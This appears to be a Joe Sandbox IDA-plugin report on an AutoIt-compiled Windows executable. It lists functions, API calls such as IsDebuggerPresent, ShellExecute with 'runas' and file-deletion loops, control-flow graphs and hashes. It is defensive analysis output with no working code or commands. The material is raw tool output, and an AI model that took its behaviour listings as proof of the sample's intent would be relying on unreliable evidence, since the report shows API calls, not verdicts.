                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                              • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                              • Opcode ID: 30baa67087110fe1af30e348672f9cee3c689770e64c7c42db283fe56b6b74ee
                                                                                                                                                                                                                                                                              • Instruction ID: f8ae34fceeb9d43bcb8f9882c43914163a92ceb92ee14524e9140490755407ea
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30baa67087110fe1af30e348672f9cee3c689770e64c7c42db283fe56b6b74ee
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EA1AF3291A2C8CFC712CBACBC459A53FA56B36300F18C99DE58097273D66D494ACB3D
                                                                                                                                                                                                                                                                              Function 006F338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F3368,?), ref: 006F33BB
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F3368,?), ref: 006F33CE
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F3368,?), ref: 006F343A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F3462,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F42A0
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F34BB
                                                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00733CB0
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 00733CF1
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007B31F4,007C2418,?,?,?,?,?,?,?,006F3368), ref: 00733D7A
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00733D81
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: GetSysColorBrush.USER32(0000000F), ref: 006F34DE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadCursorW.USER32(00000000,00007F00), ref: 006F34ED
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(00000063), ref: 006F3503
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(000000A4), ref: 006F3515
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadIconW.USER32(000000A2), ref: 006F3527
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F353F
                                                                                                                                                                                                                                                                                • Part of subcall function 006F34D3: RegisterClassExW.USER32(?), ref: 006F3590
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F35E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3602
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F3616
                                                                                                                                                                                                                                                                                • Part of subcall function 006F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F361F
                                                                                                                                                                                                                                                                                • Part of subcall function 006F396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F3A3C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                              • String ID: 0$|$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                              • API String ID: 683915450-569504614
                                                                                                                                                                                                                                                                              • Opcode ID: 6026349b0252b62c7f44a3ffae151bdbf7068380b3958a67ab1b611379443a12
                                                                                                                                                                                                                                                                              • Instruction ID: 433476250f4fcd46185a3ef7747b1ae9891ead704a514a0e1cf3be17d7e0689b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6026349b0252b62c7f44a3ffae151bdbf7068380b3958a67ab1b611379443a12
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C510971148388AAD715EF60DC05DBE7BAAAF84740F00452CF681522A3DF6C9F4AC76A
                                                                                                                                                                                                                                                                              Function 0075DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 1741 75dc54-75dc9b call 6fbf73 * 3 call 6f5851 call 75eab0 1752 75dc9d-75dca6 call 6f6b7c 1741->1752 1753 75dcab-75dcdc call 6f568e FindFirstFileW 1741->1753 1752->1753 1757 75dcde-75dce0 1753->1757 1758 75dd4b-75dd52 FindClose 1753->1758 1757->1758 1759 75dce2-75dce7 1757->1759 1760 75dd56-75dd78 call 6fbd98 * 3 1758->1760 1762 75dd26-75dd38 FindNextFileW 1759->1762 1763 75dce9-75dd24 call 6fbed9 call 6f7bb5 call 6f6b7c DeleteFileW 1759->1763 1762->1757 1766 75dd3a-75dd40 1762->1766 1763->1762 1776 75dd42-75dd49 FindClose 1763->1776 1766->1757 1776->1760
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075DCCB
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DD1B
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075DD2C
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DD43
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075DD4C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                              • Opcode ID: 1fa2f6c3315750279f934400a76c8dd3d8aaafcb6f0e69df0e74abaf62465d45
                                                                                                                                                                                                                                                                              • Instruction ID: 04224ee3250416a0da9c2517ccc3aa7ba34a7e31f9a11cfd2faf991c5e8c1e01
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa2f6c3315750279f934400a76c8dd3d8aaafcb6f0e69df0e74abaf62465d45
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A316D310093499FC360EB24C8958EFB7E9BE96301F40495DF9D582191EB65DE0DCB6B
                                                                                                                                                                                                                                                                              Function 0075DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0075DDAC
                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0075DDBA
                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0075DDDA
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0075DE87
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6b28ad98d0d0a082d4a0a8d20a3363d9e753a2c21f5bd1e174bc9995c54080e4
                                                                                                                                                                                                                                                                              • Instruction ID: a1ea800ff44e4a2f634457ecb2557b257568b6b0175727408d7f94bab8028dc6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b28ad98d0d0a082d4a0a8d20a3363d9e753a2c21f5bd1e174bc9995c54080e4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 073191711083049FD320EF50D885ABFBBE8AF99350F14092DFA81871A1DBB59D49CB96
                                                                                                                                                                                                                                                                              Function 0070FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                              • Instruction ID: 9f5549e65db97e24c0d0d96638d9956fc2c6b8da8f55bded88fb16011c305591
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4331D374A00105DFC718DF5CD480AA9FBA6FB49300B2486A5E409CB292E7BAEDC1CBC0
                                                                                                                                                                                                                                                                              Function 0070AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 0 70ac3e-70b063 call 6f8ec0 call 70bc58 call 6fe6a0 7 748584-748591 0->7 8 70b069-70b073 0->8 11 748596-7485a5 7->11 12 748593 7->12 9 70b079-70b07e 8->9 10 74896b-748979 8->10 13 70b084-70b090 call 70b5b6 9->13 14 7485b2-7485b4 9->14 17 74897e 10->17 18 74897b 10->18 15 7485a7 11->15 16 7485aa 11->16 12->11 21 7485bd 13->21 25 70b096-70b0a3 call 6fc98d 13->25 14->21 15->16 16->14 19 748985-74898e 17->19 18->17 22 748990 19->22 23 748993 19->23 26 7485c7 21->26 22->23 27 74899c-7489eb call 6fe6a0 call 70bbbe * 2 23->27 33 70b0ab-70b0b4 25->33 31 7485cf-7485d2 26->31 65 70b1e0-70b1f5 27->65 66 7489f1-748a03 call 70b5b6 27->66 34 70b158-70b16f 31->34 35 7485d8-748600 call 714cd3 call 6f7ad5 31->35 37 70b0b8-70b0d6 call 714d98 33->37 40 748954-748957 34->40 41 70b175 34->41 76 748602-748606 35->76 77 74862d-748651 call 6f7b1a call 6fbd98 35->77 57 70b0e5 37->57 58 70b0d8-70b0e1 37->58 45 748a41-748a79 call 6fe6a0 call 70bbbe 40->45 46 74895d-748960 40->46 47 7488ff-748920 call 6fe6a0 41->47 48 70b17b-70b17e 41->48 45->65 101 748a7f-748a91 call 70b5b6 45->101 46->27 54 748962-748965 46->54 47->65 69 748926-748938 call 70b5b6 47->69 55 70b184-70b187 48->55 56 748729-748743 call 70bbbe 48->56 54->10 54->65 67 70b18d-70b190 55->67 68 7486ca-7486e0 call 6f6c03 55->68 86 74888f-7488b5 call 6fe6a0 56->86 87 748749-74874c 56->87 57->26 61 70b0eb-70b0fc 57->61 58->37 59 70b0e3 58->59 59->61 61->10 70 70b102-70b11c 61->70 71 70b1fb-70b20b call 6fe6a0 65->71 72 748ac9-748acf 65->72 106 748a05-748a0d 66->106 107 748a2f-748a3c call 6fc98d 66->107 79 748656-748659 67->79 80 70b196-70b1b8 call 6fe6a0 67->80 68->65 104 7486e6-7486fc call 70b5b6 68->104 110 748945 69->110 111 74893a-748943 call 6fc98d 69->111 70->31 83 70b122-70b154 call 70bbbe call 6fe6a0 70->83 72->33 89 748ad5 72->89 76->77 91 748608-74862b call 6fad40 76->91 77->79 79->10 84 74865f-748674 call 6f6c03 79->84 80->65 108 70b1ba-70b1cc call 70b5b6 80->108 83->34 84->65 131 74867a-748690 call 70b5b6 84->131 86->65 134 7488bb-7488cd call 70b5b6 86->134 99 74874e-748751 87->99 100 7487bf-7487de call 6fe6a0 87->100 89->10 91->76 91->77 114 748757-748774 call 6fe6a0 99->114 115 748ada-748ae8 99->115 100->65 151 7487e4-7487f6 call 70b5b6 100->151 147 748ab5-748abe call 6fc98d 101->147 148 748a93-748a9b 101->148 152 74870d-748716 call 6f8ec0 104->152 153 7486fe-74870b call 6f8ec0 104->153 122 748a1e-748a29 call 6fb4b1 106->122 123 748a0f-748a13 106->123 144 748ac2-748ac4 107->144 157 70b1d2-70b1de 108->157 158 7486ba-7486c3 call 6fc98d 108->158 130 748949-74894f 110->130 111->130 114->65 161 74877a-74878c call 70b5b6 114->161 137 748aed-748afd 115->137 138 748aea 115->138 122->107 159 748b0b-748b19 122->159 123->122 124 748a15-748a19 123->124 140 748aa1-748aa3 124->140 130->65 171 748692-74869b call 6fc98d 131->171 172 74869d-7486ab call 6f8ec0 131->172 176 7488de 134->176 177 7488cf-7488dc call 6fc98d 134->177 154 748b02-748b06 137->154 155 748aff 137->155 138->137 140->65 144->65 147->144 162 748a9d 148->162 163 748aa8-748ab3 call 6fb4b1 148->163 151->65 189 7487fc-748805 call 70b5b6 151->189 181 748719-748724 call 6f8577 152->181 153->181 154->71 155->154 157->65 158->68 168 748b1e-748b21 159->168 169 748b1b 159->169 194 74878e-74879d call 6fc98d 161->194 195 74879f 161->195 162->140 163->147 163->159 168->19 169->168 201 7486ae-7486b5 171->201 172->201 188 7488e2-7488e9 176->188 177->188 181->65 197 7488f5 call 6f3907 188->197 198 7488eb-7488f0 call 6f396b 188->198 206 748807-748816 call 6fc98d 189->206 207 748818 189->207 203 7487a3-7487ae call 719334 194->203 195->203 211 7488fa 197->211 198->65 201->65 203->10 218 7487b4-7487ba 203->218 213 74881c-74883f 206->213 207->213 211->65 216 748841-748848 213->216 217 74884d-748850 213->217 216->217 219 748860-748863 217->219 220 748852-74885b 217->220 218->65 221 748865-74886e 219->221 222 748873-748876 219->222 220->219 221->222 222->65 223 74887c-74888a 222->223 223->65
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: 4x$@x$Px$`*|$`x$d0b$d10m0$d1b$d1r0,2$d5m0$e#|$i$tx$tx$(|$(|$(|$(|$x$x
                                                                                                                                                                                                                                                                              • API String ID: 0-3624879713
                                                                                                                                                                                                                                                                              • Opcode ID: 8462024d457d66bae347fa58c13de65ba4dadfd70875b4b0a840748f008cdb0c
                                                                                                                                                                                                                                                                              • Instruction ID: 773621f7585be44115d23ad4e57c78b633bb23adc10fb68eb92fb379ca67e715
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8462024d457d66bae347fa58c13de65ba4dadfd70875b4b0a840748f008cdb0c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21625C70508349CFC764DF14C094AAABBE1FF89304F10896EE5998B392DB79E945CF92
                                                                                                                                                                                                                                                                              Function 006F3624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006F3657
                                                                                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 006F3681
                                                                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3692
                                                                                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 006F36AF
                                                                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F36BF
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 006F36D5
                                                                                                                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F36E4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                              • String ID: +$0$0+m"o$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                              • API String ID: 2914291525-2075919160
                                                                                                                                                                                                                                                                              • Opcode ID: b70f08b9c8ac2df082646912d9b052e85158e4d61e386f32f3c55ef685e12e17
                                                                                                                                                                                                                                                                              • Instruction ID: a01bb0325f9805a8fe15b70bdeb036381630072118349610856d2e2b07d1eb27
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b70f08b9c8ac2df082646912d9b052e85158e4d61e386f32f3c55ef685e12e17
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4021F4B1D41308AFDB10DFA4EC89B9DBBB4FB08710F20811AF611A62A0D7B95941CF99
                                                                                                                                                                                                                                                                              Function 006F370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 356 6f370f-6f3724 357 6f3726-6f3729 356->357 358 6f3784-6f3786 356->358 359 6f372b-6f3732 357->359 360 6f378a 357->360 358->357 361 6f3788 358->361 362 6f3738-6f373d 359->362 363 6f3804-6f380c PostQuitMessage 359->363 365 733df4-733e1c call 6f2f92 call 70f23c 360->365 366 6f3790-6f3795 360->366 364 6f376f-6f3777 DefWindowProcW 361->364 367 733e61-733e75 call 75c8f7 362->367 368 6f3743-6f3747 362->368 371 6f37b8-6f37ba 363->371 370 6f377d-6f3783 364->370 402 733e21-733e28 365->402 372 6f37bc-6f37e3 SetTimer RegisterWindowMessageW 366->372 373 6f3797-6f379a 366->373 367->371 393 733e7b 367->393 374 6f380e-6f3818 call 70fcad 368->374 375 6f374d-6f3752 368->375 371->370 372->371 376 6f37e5-6f37f0 CreatePopupMenu 372->376 379 733d95-733d98 373->379 380 6f37a0-6f37b3 KillTimer call 6f3907 call 6f59ff 373->380 395 6f381d 374->395 382 733e46-733e4d 375->382 383 6f3758-6f375d 375->383 376->371 387 733dd0-733def MoveWindow 379->387 388 733d9a-733d9e 379->388 380->371 382->364 390 733e53-733e5c call 751423 382->390 391 6f3763-6f3769 383->391 392 6f37f2-6f3802 call 6f381f 383->392 387->371 396 733da0-733da3 388->396 397 733dbf-733dcb SetFocus 388->397 390->364 391->364 391->402 392->371 393->364 395->371 396->391 398 733da9-733dba call 6f2f92 396->398 397->371 398->371 402->364 406 733e2e-733e41 call 6f3907 call 6f396b 402->406 406->364
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006F3709,?,?), ref: 006F3777
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,006F3709,?,?), ref: 006F37A3
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006F37C6
                                                                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006F3709,?,?), ref: 006F37D1
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 006F37E5
                                                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 006F3806
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                              • String ID: 0$|$0$|$TaskbarCreated
                                                                                                                                                                                                                                                                              • API String ID: 129472671-3601538093
                                                                                                                                                                                                                                                                              • Opcode ID: 5eac9a312978c6d904a43d76509e1c8de331d89b4fe01d46e9fe604c0e67a3ee
                                                                                                                                                                                                                                                                              • Instruction ID: e9bc6035d4279c9d5ce46920207f864d109819ab4404408a1ce4e94e3812cc92
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eac9a312978c6d904a43d76509e1c8de331d89b4fe01d46e9fe604c0e67a3ee
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41A5F12441ACBAEB243B389C49FB93B66E705300F14812DF701993A6DA7C9F46976D
